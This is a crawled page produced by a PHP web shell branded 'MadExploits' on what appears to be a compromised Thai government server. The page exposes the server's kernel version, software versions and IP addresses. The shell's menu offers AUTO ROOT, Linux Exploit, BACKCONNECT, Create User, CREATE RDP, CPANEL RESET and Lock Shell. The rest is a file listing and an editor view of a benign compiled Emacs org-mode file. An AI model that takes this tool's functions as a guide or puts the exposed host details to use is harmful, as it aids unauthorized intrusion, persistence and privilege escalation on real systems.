Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
org /
[ HOME SHELL ]
Name
Size
Permission
Action
org-agenda.elc
214.7
KB
-rw-r--r--
org-archive.elc
11.75
KB
-rw-r--r--
org-attach.elc
14.21
KB
-rw-r--r--
org-bbdb.elc
7.37
KB
-rw-r--r--
org-bibtex.elc
4.13
KB
-rw-r--r--
org-clock.elc
35.05
KB
-rw-r--r--
org-colview.elc
41.45
KB
-rw-r--r--
org-compat.elc
7.48
KB
-rw-r--r--
org-exp.elc
149.66
KB
-rw-r--r--
org-export-latex.elc
44.23
KB
-rw-r--r--
org-faces.elc
20.18
KB
-rw-r--r--
org-footnote.elc
13.77
KB
-rw-r--r--
org-gnus.elc
5.74
KB
-rw-r--r--
org-id.elc
16.92
KB
-rw-r--r--
org-info.elc
1.68
KB
-rw-r--r--
org-install.elc
635
B
-rw-r--r--
org-irc.elc
5.89
KB
-rw-r--r--
org-jsinfo.elc
5.39
KB
-rw-r--r--
org-list.elc
32.5
KB
-rw-r--r--
org-mac-message.elc
2.27
KB
-rw-r--r--
org-macs.elc
7.83
KB
-rw-r--r--
org-mew.elc
2.92
KB
-rw-r--r--
org-mhe.elc
5.16
KB
-rw-r--r--
org-mouse.elc
32.83
KB
-rw-r--r--
org-plot.elc
10.28
KB
-rw-r--r--
org-publish.elc
20.43
KB
-rw-r--r--
org-remember.elc
31.7
KB
-rw-r--r--
org-rmail.elc
2.82
KB
-rw-r--r--
org-table.elc
136.62
KB
-rw-r--r--
org-timer.elc
7.61
KB
-rw-r--r--
org-vm.elc
2.91
KB
-rw-r--r--
org-w3m.elc
3.88
KB
-rw-r--r--
org-wl.elc
2.82
KB
-rw-r--r--
org.elc
505.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org-jsinfo.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:47 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/org/org-jsinfo.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`org-jsinfo.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\"\210\305\306\307\"\210\310\311\312\313\314\315\316\317&\207" [require org-exp add-to-list org-export-inbuffer-options-extra ("INFOJS_OPT" :infojs-opt) add-hook org-export-options-filters org-infojs-handle-options custom-declare-group org-infojs nil "Options specific for using org-info.js in HTML export of Org-mode files." :tag "Org Export HTML INFOJS" :group org-export-html] 8) #@352 Should Sebastian Rose's Java Script org-info.js be linked into HTML files? This option can be nil or t to never or always use the script. It can also be the symbol `when-configured', meaning that the script will be linked into the export file if and only if there is a "#+INFOJS_OPT:" line in the buffer. See also the variable `org-infojs-options'. (custom-declare-variable 'org-export-html-use-infojs ''when-configured '(#$ . 1037) :group 'org-export-html :group 'org-infojs :type '(choice (const :tag "Never" nil) (const :tag "When configured in buffer" when-configured) (const :tag "Always" t))) #@59 JavaScript options, long form for script, default values. (defconst org-infojs-opts-table '((path PATH "http://orgmode.org/org-info.js") (view VIEW "info") (toc TOC :table-of-contents) (ftoc FIXED_TOC "0") (tdepth TOC_DEPTH "max") (sdepth SECTION_DEPTH "max") (mouse MOUSE_HINT "underline") (buttons VIEW_BUTTONS "0") (ltoc LOCAL_TOC "1") (up LINK_UP :link-up) (home LINK_HOME :link-home)) (#$ . 1644)) (byte-code "\301\300!\203 \302\236\203 \303\302\236\"\301\207" [org-infojs-options boundp runs delq] 3) #@441 Options settings for the INFOJS Javascript. Each of the options must have an entry in `org-export-html/infojs-opts-table'. The value can either be a string that will be passed to the script, or a property. This property is then assumed to be a property that is defined by the Export/Publishing setup of Org. The `sdepth' and `tdepth' parameters can also be set to "max", which means to use the maximum value consistent with other options. (custom-declare-variable 'org-infojs-options '(mapcar (lambda (x) (cons (car x) (nth 2 x))) org-infojs-opts-table) '(#$ . 2164) :group 'org-infojs :type (byte-code "\301\302\303\304\303\305\306\"BBBBB\207" [org-infojs-opts-table set :greedy t :inline mapcar #[(x) "\301\302@D\303E\207" [x cons const (choice (symbol :tag "Publishing/Export property") (string :tag "Value"))] 3]] 8)) #@129 The template for the export style additions when org-info.js is used. Option settings will replace the %MANAGER-OPTIONS cookie. (custom-declare-variable 'org-infojs-template '"<script type=\"text/javascript\" src=\"%SCRIPT_PATH\"></script>\n<script type=\"text/javascript\" >\n<!--/*--><![CDATA[/*><!--*/\n%MANAGER_OPTIONS\norg_html_manager.setup(); // activate after the parameters are set\n/*]]>*/-->\n</script>" '(#$ . 2996) :group 'org-infojs :type 'string) #@76 Analyze JavaScript options in INFO-PLIST and modify EXP-PLIST accordingly. (defalias 'org-infojs-handle-options #[(exp-plist) "\203 \306=\203 \307 \310\"\203 \311\312\307 \310\"\"\203 \207\n\307 \313\"\307 \314\"\315\211\211\211\211\211\211\211\211\211)*+,-./0../\250\203\\ /^\307 \310\",1\f\211A@\211+\2036+@*+A@)\316*2\"A\2119\203\223 \317>\204\223 \307 \",\203\255 \311\320\321*\",\"\203\255 \322\323,\"\202\257 *\324=\203\312 \311\3250\"\203e \326 \327\2110$0\202e *\330=\203\343 \331 !\250\203e \331 !.^\202e *\332=\203\374 \331 !\250\203e \331 !.^\202e \327=\204 \333\232\203\f\334\202) \315=\204 \335\232\203\336\202) ;\203% \202)\320\337 \") B-B-\202e \340 \313#^\341B-B-\342\343-\344#\211-\203\210-G\345V\203\210\311\3460\"\203\210\326-\327\2110$\211-\203\210\340 \347\307 \347\"\206\202\350\344-Q#\307 \313\"\204\225\340 \313\327# . \207" [org-export-html-use-infojs exp-plist org-infojs-template default table val when-configured plist-get :infojs-opt string-match "\\<view:nil\\>" :table-of-contents :headline-levels nil assoc (t nil) format " %s:\\(\\S-+\\)" match-string 1 path "%SCRIPT_PATH" replace-match t sdepth read tdepth "t" "1" "nil" "0" "%s" plist-put "TOC_DEPTH" mapconcat #[(x) "\301\302@A#\207" [x format "org_html_manager.set(\"%s\", \"%s\");"] 4] "\n" 0 "%MANAGER_OPTIONS" :style-extra "" var opt e v s hlevels ptoc template org-infojs-opts-table org-infojs-options] 14 (#$ . 3465)]) (defalias 'org-infojs-options-inbuffer-template #[nil "\303\304\305=\205 \306\307 \"A\306\310 \"A\211\311>\203 \n\202\"